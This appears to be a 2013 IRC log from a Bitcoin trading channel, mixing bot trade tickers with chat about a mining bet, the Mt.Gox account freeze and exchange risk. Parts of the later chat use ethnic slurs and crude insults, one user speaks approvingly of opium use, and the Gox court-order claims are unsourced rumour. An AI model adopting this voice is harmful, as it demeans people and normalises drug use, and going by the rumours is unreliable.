BTC [-] May 15 02:27:01 [HAVELOCK] [VTX] 9 @ 0.449 = 4.041 BTC [-] May 15 02:28:35 ;;ticker May 15 02:28:36 BTCUSD ticker | Best bid: 111.90000, Best ask: 111.97999, Bid-ask spread: 0.07999, Last trade: 111.90000, 24 hour volume: 84762.14601332, 24 hour low: 109.42198, 24 hour high: 119.80002, 24 hour vwap: 115.01980 May 15 02:30:03 [HAVELOCK] [HIM] 2 @ 2.23 = 4.46 BTC [+] May 15 02:32:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.01668 BTC [+] May 15 02:32:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.01668 BTC [+] May 15 02:33:02 [HAVELOCK] [VTX] 5 @ 0.4491 = 2.2455 BTC [+] May 15 02:33:10 [BTCTC] [TAT.ASICMINER] 1 @ 0.01668 BTC [+] May 15 02:33:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.01668 BTC [+] May 15 02:35:25 [BTCTC] [ASICMINER-PT] 1 @ 1.6 BTC [+] May 15 02:36:02 [HAVELOCK] [HIM] 1 @ 2.23 BTC [+] May 15 02:36:12 [BTCTC] [TAT.ASICMINER] 41 @ 0.016679 = 0.6838 BTC [-] May 15 02:42:02 [HAVELOCK] [VTX] 5 @ 0.449 = 2.245 BTC [-] May 15 02:45:16 who made the asicminer bitbet ? May 15 02:54:07 which? May 15 02:55:49 [MPEX] [S.MPOE] 200 @ 0.00068606 = 0.1372 BTC [-] May 15 02:57:02 potato May 15 02:57:57 whats the bet? May 15 02:59:04 https://bitcointalk.org/index.php?topic=205619.0 May 15 02:59:06 that thing May 15 02:59:49 there is a way May 15 03:00:09 limit the way the bet is counted to the top 10 pools May 15 03:00:23 and to any blocks signed by asicminer officially May 15 03:00:27 or May 15 03:00:40 [BTCTC] [ASICMINER-PT] 1 @ 1.6 BTC [+] May 15 03:00:47 mircea_popescu: seems strange to argue for clarity on that bet but to ignore BFL July bet clarification requests May 15 03:00:57 change it to somehting that can be measured May 15 03:00:58 https://bitcointalk.org/index.php?topic=192122.msg2123860#msg2123860 May 15 03:01:01 that equivocates to 50TH+ May 15 03:01:22 bet feels weird still May 15 03:01:24 hmm May 15 03:02:30 June 1st? May 15 03:02:36 thats a bit optimiztic May 15 03:02:38 s May 15 03:03:02 [HAVELOCK] [HIM] 4 @ 2.23 = 8.92 BTC [+] May 15 03:03:29 inhies ignore teh hm ? May 15 03:03:37 would friedcat verifying the total hashrate, paired with some remotely provable way work? May 15 03:03:56 ThickAsThieves if you were a bettor would you take his word ? May 15 03:04:47 yes May 15 03:05:03 as long i could see it in pools May 15 03:05:08 aha. well... May 15 03:05:18 [BTCTC] [ASICMINER-PT] 1 @ 1.629999 BTC [+] May 15 03:05:22 he has discussed going private tho May 15 03:05:25 but if he did May 15 03:05:31 he can sign blocks right? May 15 03:05:45 well ya but it's a hassle and why bother May 15 03:05:52 and you can deduce hashrate based on qty of signed blocks and current diff May 15 03:06:06 except it's noisy May 15 03:06:13 what if implied hash is 48 TH. May 15 03:06:18 maybe it was really 51 and unlucky May 15 03:06:22 it also leaves the possibilty that he mines somewhere else and doesnt report it May 15 03:06:25 and keeps all profit May 15 03:06:25 then establish a sample period May 15 03:06:28 like 1 week May 15 03:06:36 I say accept it at face value May 15 03:06:37 or 2046 blocks May 15 03:06:41 or such May 15 03:06:52 its resolved at whatever that link referenced says May 15 03:07:04 true May 15 03:07:08 should be a good recipie for inhies level butthurt May 15 03:07:40 ;;ticker May 15 03:07:41 BTCUSD ticker | Best bid: 109.90000, Best ask: 109.98999, Bid-ask spread: 0.08999, Last trade: 109.90000, 24 hour volume: 91597.57339136, 24 hour low: 109.42198, 24 hour high: 119.80002, 24 hour vwap: 114.64735 May 15 03:08:04 ;;goxlag May 15 03:08:05 MtGox lag is 18.980412 seconds. During this time, light travels 0.0380365331327 AU. You could have sent a bitcoin ten times between Earth and Moon (0.0257 AU). May 15 03:08:16 inhies: fwiw the advertised specs wrt that bet are obviously the initial spec BFL released when they took their first order May 15 03:08:42 since that order has not yet been fulfilled it is the only reasonable benchmark May 15 03:09:38 so 3.5GH@<5W, 65GH@65W etc May 15 03:09:40 dub: but other parties are saying its the most recent specs May 15 03:09:48 inhies: other parties are retarded May 15 03:09:49 which according to them are from a november 2012 forum post May 15 03:10:02 [HAVELOCK] [ASICM] 11 @ 0.01584 = 0.1742 BTC [-] May 15 03:10:04 [HAVELOCK] [ASICM] 53 @ 0.0158 = 0.8374 BTC [-] May 15 03:10:10 and that newer posts by BFL are not to be regarded as advertisements, even though they contain updated specs May 15 03:11:02 it only matters what was advertised when the most recent order that has not been fulfilled was taken, which is the first one May 15 03:13:36 wtf "Mtgox trading engine lag: 47405m 13s" ^^ May 15 03:14:02 [HAVELOCK] [VTX] 6 @ 0.449 = 2.694 BTC [-] May 15 03:14:19 obviously for any future bets the spec those order holders agreed to last week applies May 15 03:14:21 ;;goxlag May 15 03:14:23 MtGox lag is 38.038516 seconds. During this time, light travels 0.0762287601635 AU. You could have sent a bitcoin ten times between Saturn and Titan (0.0802 AU). May 15 03:15:35 which is, of course, no spec May 15 03:16:30 ;;ticker --last May 15 03:16:31 106.90000 May 15 03:19:11 $2 tiem May 15 03:19:57 [BTCTC] [ASICMINER-PT] 1 @ 1.58 BTC [-] May 15 03:20:02 [BTCTC] [ASICMINER-PT] 1 @ 1.570001 BTC [-] May 15 03:20:14 [BTCTC] [ASICMINER-PT] 1 @ 1.57 BTC [-] May 15 03:20:18 [BTCTC] [ASICMINER-PT] 1 @ 1.569 BTC [-] May 15 03:20:21 [BTCTC] [ASICMINER-PT] 1 @ 1.56 BTC [-] May 15 03:20:37 [BTCTC] [ASICMINER-PT] 1 @ 1.541 BTC [-] May 15 03:20:45 [BTCTC] [ASICMINER-PT] 1 @ 1.5402 BTC [-] May 15 03:20:59 [BTCTC] [ASICMINER-PT] 1 @ 1.5402 BTC [-] May 15 03:21:14 [BTCTC] [ASICMINER-PT] 6 @ 1.54001 = 9.2401 BTC [-] May 15 03:21:29 [BTCTC] [ASICMINER-PT] 1 @ 1.53 BTC [-] May 15 03:21:36 [BTCTC] [ASICMINER-PT] 1 @ 1.526 BTC [-] May 15 03:21:43 panic selling to panic sell ... May 15 03:21:49 [BTCTC] [ASICMINER-PT] 1 @ 1.5251 BTC [-] May 15 03:21:55 [BTCTC] [ASICMINER-PT] 1 @ 1.521 BTC [-] May 15 03:22:15 [BTCTC] [ASICMINER-PT] 1 @ 1.5203 BTC [-] May 15 03:22:59 [BTCTC] [TAT.ASICMINER] 2 @ 0.016679 = 0.0334 BTC [-] May 15 03:23:04 [BTCTC] [TAT.ASICMINER] 8 @ 0.016679 = 0.1334 BTC [-] May 15 03:23:27 ;;ticker --last May 15 03:23:28 103.10000 May 15 03:23:50 [BTCTC] [ASICMINER-PT] 1 @ 1.520205 BTC [-] May 15 03:24:44 [BTCTC] [TAT.ASICMINER] 10 @ 0.01609 = 0.1609 BTC [-] May 15 03:24:51 [BTCTC] [TAT.ASICMINER] 10 @ 0.015443 = 0.1544 BTC [-] May 15 03:24:59 [BTCTC] [TAT.ASICMINER] 4 @ 0.015442 = 0.0618 BTC [-] May 15 03:25:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.0152 BTC [-] May 15 03:25:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.01518 BTC [-] May 15 03:25:35 [BTCTC] [TAT.ASICMINER] 21 @ 0.0151 = 0.3171 BTC [-] May 15 03:25:49 [BTCTC] [TAT.ASICMINER] 21 @ 0.016679 = 0.3503 BTC [+] May 15 03:27:14 http://blockchained.com/depth_mtgox_15d.png May 15 03:27:42 wtf "Mtgox trading engine lag: 47405m 13s" ^^ bwahah May 15 03:28:17 dub i have no idea why this stuff proves so difficult May 15 03:28:35 other than having half a bitcoin riding on the result completely changes the pleb's "reasoning" May 15 03:29:23 mircea_popescu: yeah, its pretty obviously sore losing May 15 03:31:45 [BTCTC] [ASICMINER-PT] 2 @ 1.533 = 3.066 BTC [+] May 15 03:41:22 [BTCTC] [TAT.ASICMINER] 9 @ 0.0151 = 0.1359 BTC [-] May 15 03:46:14 [MPEX] [S.DICE] 6677 @ 0.003 = 20.031 BTC [-] May 15 03:46:15 [MPEX] [S.DICE] 1000 @ 0.00286002 = 2.86 BTC [-] May 15 03:46:19 [MPEX] [S.DICE] 1888 @ 0.00286001 = 5.3997 BTC [-] May 15 03:46:23 [MPEX] [S.DICE] 3602 @ 0.00286 = 10.3017 BTC [-] May 15 03:46:25 [MPEX] [S.DICE] 1833 @ 0.00285001 = 5.2241 BTC [-] May 15 03:49:52 [BTCTC] [ASICMINER-PT] 1 @ 1.662399 BTC [+] May 15 03:50:10 [BTCTC] [ASICMINER-PT] 1 @ 1.6624 BTC [+] May 15 03:50:36 [BTCTC] [ASICMINER-PT] 1 @ 1.6625 BTC [+] May 15 03:55:20 [BTCTC] [COGNITIVE] 1 @ 0.238 BTC [+] May 15 04:02:29 [BTCTC] [TAT.ASICMINER] 9 @ 0.016199 = 0.1458 BTC [+] May 15 04:04:06 [HAVELOCK] [ASICM] 2 @ 0.0165 = 0.033 BTC [+] May 15 04:05:03 [HAVELOCK] [KCIM] 2 @ 1.4 = 2.8 BTC [-] May 15 04:26:03 [BTCTC] [COGNITIVE] 1 @ 0.238 BTC [+] May 15 04:34:02 [HAVELOCK] [ASICM] 100 @ 0.0162 = 1.62 BTC [-] May 15 04:34:04 [HAVELOCK] [ASICM] 59 @ 0.01615 = 0.9529 BTC [-] May 15 04:34:05 [HAVELOCK] [ASICM] 14 @ 0.0161 = 0.2254 BTC [-] May 15 04:40:47 found this forgot tab from earlier May 15 04:40:52 forgotten* May 15 04:41:08 first goog image hit for sauna laptop is http://4.bp.blogspot.com/_PTcAse9K7sg/S51ccvhaeDI/AAAAAAAAAHY/EWg7NCg6ZJY/s800/Untitled253-2.jpg May 15 04:42:20 possibly weirder is the second http://farm4.staticflickr.com/3224/2769507754_5def99673b_z.jpg May 15 04:49:54 i really can't decide what's more amusing : the tortilla nutjob going unbridled May 15 04:50:05 or caldwell trying to "mentor" him and be helpful and whatnot. May 15 04:50:53 honestly i think of the two caldwell is the greater fool. tortilla at least has the excuse of being born stupid rather than deliberately stultyfying himself "for great social justice". May 15 04:51:37 are you referencing to some recent postings May 15 04:52:00 https://www.facebook.com/CampBX/posts/593750063970782 May 15 04:52:13 campbx having dwolla problems May 15 04:52:25 https://bitcointalk.org/index.php?topic=174620.msg2016437#msg2016437 May 15 04:52:36 bitcoin confirmed illegal terrorist WMD May 15 04:53:40 dub let me dig this old convo May 15 04:55:12 bah i don't have it logged. maybe kako does May 15 04:55:27 back in the day maybe 6 months ago or so i went on the dwolla chan asked them wtf they think their future is May 15 04:55:31 given that bitcoin owns them May 15 04:55:44 maybe they finally figured it out and this is the response :D May 15 04:56:49 er, I think dwolla is getting pwned here too May 15 04:57:05 USG is making moves against bitcoin May 15 04:57:59 naw, collateral damage - that after someone or some group May 15 04:58:04 Al Quaeda biddin on some that shit May 15 04:58:35 I'd fap to bein leet one day and gankin their btc wallet May 15 04:58:45 wat May 15 05:00:07 My wallet now bitch (محفظتي الآن العاهرة) May 15 05:00:41 holy shit krs-1, quit showin' off for the new online #assets log May 15 05:00:59 fuckin' infidels May 15 05:01:15 there's an ass log? May 15 05:01:16 i got this May 15 05:01:25 ;;google infidels May 15 05:01:26 Infidel - Wikipedia, the free encyclopedia: ; Infidels - Wikipedia, the free encyclopedia: ; Secular Web: Atheism, Agnosticism, Naturalism, Skepticism and ...: May 15 05:01:56 you got shit you abrahamic terrorist. May 15 05:02:11 drone on its way May 15 05:02:17 [BTCTC] [COGNITIVE] 1 @ 0.21 BTC [-] May 15 05:03:19 too late I've already GPS jacked it May 15 05:03:33 so the drone was infidel ? May 15 05:04:16 http://www.dailymail.co.uk/sciencetech/article-2324188/Amazon-launches-virtual-currency-called-Coins-gives-tens-millions-away-free-US-Kindle-owners.html May 15 05:04:18 lulzy. May 15 05:06:56 wtf lol im no terrorist, but i be tryin to gank their wallet yo May 15 05:10:18 dron on its way back bitch May 15 05:10:19 who do i bug about btct.co site improvements/issues? May 15 05:10:35 is there a sysop listed May 15 05:11:38 ;;topic May 15 05:11:38 http://bitcoin-assets.com || http://log.bitcoin-assets.com - most days worth reading, I heard. May 15 05:11:41 they are listed there May 15 05:12:48 you could bug burnside directly May 15 05:13:40 "- The matters we discuss are quite important, as I don't know how operative the Bitcoin Foundation is in the middle of this lawsuit, MP is for some reason still ridiculing me despite my attempts to establish contact, also it should be obvious that the USD/BTC exchanges in their current form cannot support millibitcoin's price going much past $1, and therefore need to be overridden as soon as possible." May 15 05:13:55 i wonder who he thinks mp is and who's been being contacted by some raving lunatic. May 15 05:18:16 what is that mp? May 15 05:18:16 [BTCTC] [ASICMINER-PT] 1 @ 1.664999 BTC [+] May 15 05:18:18 [BTCTC] [ASICMINER-PT] 1 @ 1.665 BTC [+] May 15 05:18:23 and why are there so many manic people involved in bitcoin? May 15 05:18:32 [BTCTC] [ASICMINER-PT] 1 @ 1.6689 BTC [+] May 15 05:19:00 i have no idea. May 15 05:19:38 well, what about this dwolla thing, the mtgox fud about men in black ? May 15 05:19:50 i've been busy... not up to date. May 15 05:20:25 drones to build, women to break, wine to drink. lots to be done. May 15 05:23:10 build a drone that builds drones foo then you dont have to build drones..dig May 15 05:23:27 like a 3d printer that makes 3d printers..which came first May 15 05:26:52 [BTCTC] [ASICMINER-PT] 1 @ 1.6899 BTC [+] May 15 05:28:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.016497 BTC [+] May 15 05:30:00 [BTCTC] [ASICMINER-PT] 2 @ 1.685 = 3.37 BTC [-] May 15 05:31:39 [BTCTC] [ASICMINER-PT] 2 @ 1.56 = 3.12 BTC [-] May 15 05:31:57 [BTCTC] [BITVPS] 100 @ 0.001095 = 0.1095 BTC [+] May 15 05:33:18 [BTCTC] [ASICMINER-PT] 2 @ 1.6899 = 3.3798 BTC [+] May 15 05:37:44 [BTCTC] [BITVPS] 100 @ 0.001095 = 0.1095 BTC [+] May 15 05:44:13 hi May 15 05:47:19 high May 15 05:47:38 oh hai May 15 05:48:00 what's sliver at anyhow? May 15 05:48:03 [HAVELOCK] [ASICM] 76 @ 0.0165 = 1.254 BTC [+] May 15 05:48:03 silver May 15 05:48:16 just got out of my splint BTW, no more lame ass left hand. May 15 05:49:12 fucking doctors want $56for doctor time, $556 for 45 minutes in urgent care, 228$ for the splint... May 15 05:49:36 13 days before I got insurance. May 15 05:51:11 i hope you're not in the states May 15 05:52:24 [MPEX] [S.MPOE] 1950 @ 0.00068598 = 1.3377 BTC [-] May 15 05:52:26 [MPEX] [S.MPOE] 5350 @ 0.00068403 = 3.6596 BTC [-] May 15 05:52:28 [MPEX] [S.MPOE] 1000 @ 0.00068202 = 0.682 BTC [-] May 15 05:53:01 nicely played May 15 05:53:21 i'm thinking of bailing, but I always have, so I just visit. **** BEGIN LOGGING AT Wed May 15 14:22:17 2013 May 15 14:22:26 -NickServ- You failed to identify in time for the nickname mircea_popescu May 15 14:23:26 where's mircea trilema article making fun of the whole mtgox US debacle May 15 14:23:46 davout: good idea May 15 14:24:23 there's mircea_popescu May 15 14:24:25 https://bitcointalk.org/index.php?topic=206003 May 15 14:24:29 have this meanwhile. May 15 14:25:52 In the same vein I would suggest the foundation of the Charles Hoskinson Institute of Bitcoin Studies, where students can enroll in online classes learning all about noted Bitcoin luminary Charles Hoskinson. May 15 14:25:53 nom May 15 14:26:10 she is though May 15 14:26:17 but they deserve to be condescended to May 15 14:26:38 i never knew she was so talented with the lampoon May 15 14:26:49 girl aspires to one day be a writer, i think it's actually possible. May 15 14:27:07 well, it gets old watching people ignore sound advice and continue pathetically failing May 15 14:27:18 very little sympath May 15 14:27:41 yeah. May 15 14:28:11 anyways, i think this should drive home the need for decentralized exchanges May 15 14:28:22 "With his muchly respected wit" -> I lold May 15 14:30:20 Next Supernode Summit -- Paris! May 15 14:30:25 o this should be great May 15 14:30:37 davout here's a deal : you go, i pay for the gopro, you stream, we lol. May 15 14:30:44 what's this supernode thing May 15 14:30:54 https://bitcointalk.org/index.php?topic=174620.0;all May 15 14:30:57 read that. all of it. May 15 14:31:01 mircea_popescu: i have no idea what you're talking about, but DEAL May 15 14:31:08 ;;google gopro May 15 14:31:09 GoPro Official Website: The World's Most Versatile Camera: ; HERO3 Cameras | More Powerful in Every Way | Most ... - GoPro: ; GoPro Official Website: The World's Most Versatile Camera: May 15 14:31:24 you affix it to your helm, it's a cam. May 15 14:32:21 i was talking about the supernode thing :-) May 15 14:32:26 yeah, that. May 15 14:32:30 that's what it is . May 15 14:33:32 oh, the thread is this guy's diary, but what the heck is a supernode? May 15 14:33:53 two first posts don't really give much info May 15 14:34:12 it really doesn't not make sense properly until you'cve read it all May 15 14:35:13 mircea_popescu: hah, just read the last post, chuckled May 15 14:35:31 guess i'll read up then May 15 14:35:48 we;ve been having a ball since yest May 15 14:37:03 [MPEX] [S.MPOE] 2932 @ 0.00067088 = 1.967 BTC [-] May 15 14:38:24 http://jhpolitics.com/2013/05/mad-magazine-pokes-fun-at-scandal-ridden-obama/ May 15 14:46:36 [BTCTC] [TAT.ASICMINER] 8 @ 0.01725 = 0.138 BTC [+] May 15 14:46:44 [BTCTC] [TAT.ASICMINER] 5 @ 0.017319 = 0.0866 BTC [+] May 15 14:51:13 he did May 15 14:51:47 [BTCTC] [ASICMINER-PT] 1 @ 1.747957 BTC [-] May 15 14:52:37 [BTCTC] [ASICMINER-PT] 1 @ 1.747958 BTC [+] May 15 14:56:01 who knows i'll have to do eventually... May 15 14:56:18 [BTCTC] [BASIC-MINING] 1 @ 0.411004 BTC [-] May 15 14:56:20 [BTCTC] [S.DICE-PT] 77 @ 0.003578 = 0.2755 BTC [+] May 15 14:56:35 [BTCTC] [S.DICE-PT] 923 @ 0.00358 = 3.3043 BTC [+] May 15 14:57:05 so do I need to pull everything out of gox? May 15 14:57:25 deadweasel: that's loong overdue May 15 14:57:49 well shit, i've been there since bitflooor shuttered May 15 14:58:12 if mtgox is fractional reserve then definitely yues May 15 14:58:12 hehehe May 15 14:58:20 i'm telling you May 15 14:58:30 centralized exchanges will fail a lot May 15 14:58:45 someone giving me a hundred dollar bill is pretty easy to manage May 15 14:59:19 [BTCTC] [TAT.ASICMINER] 20 @ 0.017319 = 0.3464 BTC [+] May 15 14:59:21 where is campbx located?> May 15 14:59:26 by the way, Ron Swanson (parks and recreation) says "Don't trust big banks or small banks, banks are ponzi schemes run by morons" May 15 14:59:33 atlanta May 15 14:59:39 re: campbx May 15 15:00:24 [BTCTC] [TAT.ASICMINER] 3 @ 0.01732 = 0.052 BTC [+] May 15 15:00:57 so like..where are my funds and btc going if i don't get out of gox? May 15 15:01:04 To the Japs? May 15 15:01:07 bl@ckr0x May 15 15:01:24 to pirate May 15 15:01:26 2012, people still using Gox... May 15 15:01:27 lol May 15 15:01:31 to pizza May 15 15:01:34 oh fuck its 2013, double face palm May 15 15:01:47 hehehe May 15 15:02:01 [MPEX] [S.MPOE] 3900 @ 0.00067001 = 2.613 BTC [-] May 15 15:02:02 atlanta doesn't sound safe at all May 15 15:02:09 well, supposedly homeland security and doj or whatever May 15 15:02:13 are freezing it May 15 15:02:16 i'd take it out in btc May 15 15:02:18 when May 15 15:02:21 but that's just me May 15 15:02:21 homeless security May 15 15:02:43 i like keeping my btc on a thumbdrive (or a virtual machine with encrypted disk) May 15 15:03:18 i always wondered about whether i'd ever need to declare btc when crossing the border May 15 15:03:42 ie. would it be illegal to carry like 20BTC over right now May 15 15:03:46 so US Homeland Security is supposed to freeze assets in a foreign exchange that they can or can't prove belong to U.S. citizens? May 15 15:03:46 [BTCTC] [BITVPS] 10 @ 0.000881 = 0.0088 BTC [-] May 15 15:03:53 i have no clue May 15 15:04:00 actually i don't think they will freeze assets May 15 15:04:05 http://www.bloomberg.com/news/2013-05-10/deadbeat-special-unveiled-in-jail-free-4-bond-argentina-credit.html May 15 15:04:07 lulzy May 15 15:04:08 KRS-1: i'm assuming they'd just freeze gox's acct at dwolla May 15 15:04:08 [BTCTC] [BITVPS] 1 @ 0.00088 BTC [-] May 15 15:04:09 i think they will simply block incoming deposits from their May 15 15:04:10 [BTCTC] [TAT.ASICMINER] 22 @ 0.01732 = 0.381 BTC [+] May 15 15:04:16 [BTCTC] [BITVPS] 100 @ 0.0008 = 0.08 BTC [-] May 15 15:04:18 [BTCTC] [TAT.ASICMINER] 18 @ 0.01732 = 0.3118 BTC [+] May 15 15:04:21 so you can't get cash out... May 15 15:04:24 but I can do a bankwire transfer to my bank here in the US May 15 15:04:25 mjr_ all their us dollars are frozen atm. May 15 15:04:28 that could work May 15 15:04:36 mircea_popescu: is that verified? May 15 15:04:44 mircea_popescu: all or just at dwolla? May 15 15:04:53 they do wire transfer too May 15 15:04:56 ^ May 15 15:05:02 all us accounts of mtgox, now or future, under order of maryland judge May 15 15:05:07 i had heard it was dwolla May 15 15:05:10 no. May 15 15:05:26 and if you wire with them either direction you're just inviting investigation. May 15 15:05:27 link? May 15 15:05:29 mircea_popescu: you have a copy of the court order? May 15 15:05:30 no link. May 15 15:05:45 joecool it's gagged. May 15 15:05:46 i personally couldnt care less, i've never used gox May 15 15:05:47 im wiring today let them investigate me i have a layer May 15 15:05:49 lawyer May 15 15:05:50 ongoing investigation. May 15 15:06:01 local exchanges FTW May 15 15:06:12 +1 mjr May 15 15:06:26 i just paid for the conference using bitcoin May 15 15:06:31 coundown to arrest of MT begins May 15 15:06:42 joecool its pretty much the same thing as that german dude May 15 15:06:46 or w/e he was, polish ? May 15 15:06:49 you know what's cool? 3 months ago this would have been a $50 drop May 15 15:06:51 at least May 15 15:06:52 kim dotcom? May 15 15:06:58 no bit24 or w/e May 15 15:06:59 now it was a $6 drop May 15 15:07:17 mjr_ what happened during these three months, you'd say ? May 15 15:07:21 and i wouldn't be surprised if the price shoots up as eveeryone wants to get btc to transfer out May 15 15:07:46 mircea_popescu: we've grown, fewer weak hands, accustomed to news of this sort May 15 15:08:05 harder to FUD people into selling May 15 15:08:11 "mp said get the fuck out of gox moths ago", etc. May 15 15:08:16 lol May 15 15:08:18 people suggesting to wire internationally to japan in USD are morons May 15 15:08:30 "erik said eh's doing it, X said he;s doing it, everyone agreed they;re doing it" May 15 15:08:31 etc. May 15 15:09:36 [BTCTC] [ASICMINER-PT] 1 @ 1.701002 BTC [-] May 15 15:09:53 [BTCTC] [TAT.ASICMINER] 21 @ 0.01732 = 0.3637 BTC [+] May 15 15:11:02 [BTCTC] [ASICMINER-PT] 1 @ 1.701001 BTC [-] May 15 15:11:36 [BTCTC] [ASICMINER-PT] 1 @ 1.701 BTC [-] May 15 15:12:09 if only you could get $ to btc-e easier May 15 15:12:19 ;;bc,diff May 15 15:12:20 Error: "bc,diff" is not a valid command. May 15 15:12:24 ;;bc,stats May 15 15:12:27 Current Blocks: 236308 | Current Difficulty: 1.1187257461360792E7 | Next Difficulty At Block: 237887 | Next Difficulty In: 1579 blocks | Next Difficulty In About: 1 week, 3 days, 19 hours, 33 minutes, and 41 seconds | Next Difficulty Estimate: 12548446.1374 | Estimated Percent Change: 12.16731 May 15 15:15:30 [BTCTC] [TAT.ASICMINER] 10 @ 0.0172 = 0.172 BTC [-] May 15 15:17:36 i shouldnt have any trouble getting usd out of gox though..i dont see why i would really May 15 15:19:19 KRS-1 that you don't see doesn't mean jack shit. May 15 15:19:26 famous last words, these, "i didn't see it coming" May 15 15:19:34 i just got my cash out via btc. lame. now where to trade?!?! May 15 15:19:34 lol May 15 15:19:53 "sry had to use your funds for my defense and pizza party" May 15 15:19:57 - MagicalTux May 15 15:20:05 open bit4x account May 15 15:20:05 its seems gox had some money frozen at dwolla, however they are still sending funds, i know a guy who got the email,. and then hours later dwoolla still send the funds May 15 15:20:07 joecool mostly pizza by weight May 15 15:20:10 or use btc-e May 15 15:20:27 the dhs is just talking shit up, i dont think they did much, maybe lock the funds on one guy, not even all of gox May 15 15:20:57 "mp said get the fuck out of gox moths ago", etc. lol i said that years ago May 15 15:21:15 lol and here is Chaaang-Noi. how's the battle for relevancy coming along ? May 15 15:21:43 DHS "AZN + computer = cyberterrorist" May 15 15:22:10 lol, doing just fine over here:) May 15 15:22:19 why would you get the fuck INTO mt gox in the first place? May 15 15:22:20 Strictly speaking Mutum Sigillum LLC got their accounts frozen. Not MtGox. May 15 15:22:20 hows your dying exchange? May 15 15:22:28 Their payment provider. May 15 15:22:49 it seems only partly, cuz they are still sending funds to gox May 15 15:22:51 mjr_: To buy bitcoins, of course. May 15 15:22:58 mjr_: At a sensible price. May 15 15:23:00 many other ways to do that May 15 15:23:21 Not if you intend to buy more than two or three at a sensible price. May 15 15:23:22 that don't involve cavity searches May 15 15:23:30 i honestly think the media over stated what really happened, also there is no source on this other than that e-mail and the leak to the media May 15 15:23:59 lol a secret court order.. usa lol May 15 15:24:04 The Democratic Republic of USA. May 15 15:24:15 :) May 15 15:24:16 Soon to be renamed, jsut wait. May 15 15:24:24 what the fuck is a supernode? May 15 15:24:37 its MP but on crack May 15 15:24:57 Scrat https://bitcointalk.org/index.php?topic=206003.0 May 15 15:24:58 that. May 15 15:25:34 Chaaang-Noi aren't you the guy who went into hiding for six months cause "teh gobinmint" was after you ? May 15 15:25:53 ? May 15 15:25:55 i like the cheek of this guy. he;'s like that bummy whore that talks shit to the cops. May 15 15:25:57 hidding from what? May 15 15:26:07 the govenment? May 15 15:26:10 Chaaang-Noi aww, deleted the forum posts and now we're tough ? May 15 15:26:17 cute. May 15 15:26:30 lol, i dont think you are thinking of the right guy May 15 15:26:40 oh i see. May 15 15:26:42 iv deleated maybe 10 posts in my 7000 plus made May 15 15:26:55 no reason to just make up lies mp May 15 15:27:29 i jest with you, dont take it personally May 15 15:27:46 and the mp on crack was a joke, clearly it was not a lie. May 15 15:28:01 the joke being, he is trying to be like you, but he is fucking nuts May 15 15:28:05 Oct 02 17:45:09 Chaang-Noi are you like this when you're drunk or when you're sober ? May 15 15:28:05 Oct 02 17:45:51 high... May 15 15:28:05 Oct 02 17:46:05 stick with it. May 15 15:28:05 Oct 02 17:46:10 on opium May 15 15:28:05 Oct 02 17:46:18 i just dont cae any more May 15 15:28:21 on opium, lol so the fuck what? May 15 15:28:38 so tone it down. May 15 15:28:39 yeah on opium people really dont care about shit:) May 15 15:28:49 you ever tried it? May 15 15:28:52 nope. May 15 15:29:01 i'm not old enough. May 15 15:29:02 trust me, you really dont give a fuck about anything while on it May 15 15:29:13 but i guess when i've had it with the world i'll prolly go out azn style May 15 15:29:24 which - incidentally - is what opium smoking is. retirement for rich folks. May 15 15:29:25 not a bad way to go if you ask me May 15 15:29:30 dunno why someone young would smoke it. May 15 15:29:42 certainly, not a bad way at all. but to go not to stay. May 15 15:29:50 iv not smoked since then, i like to do it once every 6 months or so if i can May 15 15:30:09 i don't like doing things half way. May 15 15:30:39 well, okay, i hear you have to take more and more to get the same effect if you use it often, so people get addicted May 15 15:30:56 i thought your national drug of choice is ya ba, goat May 15 15:31:09 im more than fine doing it "half way" as my goal was to have a good time, not sleep forevar May 15 15:31:23 ya, iv never done, and never will do ya ba or anything meth related May 15 15:31:49 well, its a quicker way to die May 15 15:32:10 though not as hard to get rid of the habit compared to opium/heroin May 15 15:32:13 i bought a racing bike today, that might be even faster :) May 15 15:32:28 well i dont have a habit on opium, never done H May 15 15:32:44 truffles: among other things May 15 15:32:46 lol that is bath salts or whatever, and im not even sure what that is May 15 15:32:55 4mar May 15 15:33:01 and its *mine as well May 15 15:33:05 ya ba is cheap homemade meth May 15 15:33:13 homemade? May 15 15:33:22 i thought the pills are mass produced by burma warlords or something May 15 15:33:33 well, ther eis ya ba, and thats the dirty cheap shit, then there is "ice" and that is the high end clean stuff May 15 15:33:50 ezdiy that's homemade May 15 15:34:03 yeah they are, in the shan state, iv been there.. but its more or less the fucking jungle May 15 15:34:07 mircea_popescu: hm, true May 15 15:34:22 mircea_popescu: warlord's lab is usually home as well for the chemists :) May 15 15:34:25 its homemade quality, its rough stuff... May 15 15:34:36 ah May 15 15:34:36 ice is the high end factory made, May 15 15:34:39 [BTCTC] [TAT.ASICMINER] 5 @ 0.01732 = 0.0866 BTC [+] May 15 15:34:39 iv never done either May 15 15:35:01 but it is the drug for the youth here, and the police hate it, they dont give a fuck about weed or opium May 15 15:35:08 weed is openly sold in the bars here for tourists May 15 15:35:18 in this city, not all cities May 15 15:35:29 well obviously, they hate uppers. May 15 15:35:36 oh, neat to see that thing finally relaxed May 15 15:35:36 downed down people are never much trouble. May 15 15:35:38 right this second im 100 miles from burma and the shan state May 15 15:36:11 its just that the thai people dont use weed or opium (other than old people) so they dont care as the target is youth May 15 15:36:16 Chaaang-Noi: dope, thats basically golden triangle :) May 15 15:36:36 the thais find it funny to see westerners use weed and opium, and pay the prices they do, and since they dont do harm, they let it slide and take a pay off from the bar managers May 15 15:36:46 ezdiy yes, im there May 15 15:37:00 iv been on the river where the three meet many many times May 15 15:37:20 life can be really fun up here May 15 15:37:37 odds are i will sooner or later try opium again, been a while and its not hard to get May 15 15:37:40 :) May 15 15:37:51 Chaaang-Noi: well, my farang friends who live somewhere near as well all ended up horrible crystal meth addicts :/ May 15 15:38:04 its easy to get here May 15 15:38:13 cheap & ubiqituous May 15 15:38:17 iv never tried it and never will, but yeah, if you like that think you can get hooked May 15 15:38:21 its really really cheap May 15 15:39:04 well i need to get ready to go out, i will be taking the drug beer tonight May 15 15:39:25 truffles iv been here 8 years and have seen some crazy shit but its not bad once you get used to it May 15 15:39:36 hell we have a mini civil war every 3 or 4o years :) May 15 15:39:54 catch ya all lata, peace May 15 15:54:03 [HAVELOCK] [SDICE] 30 @ 0.2692 = 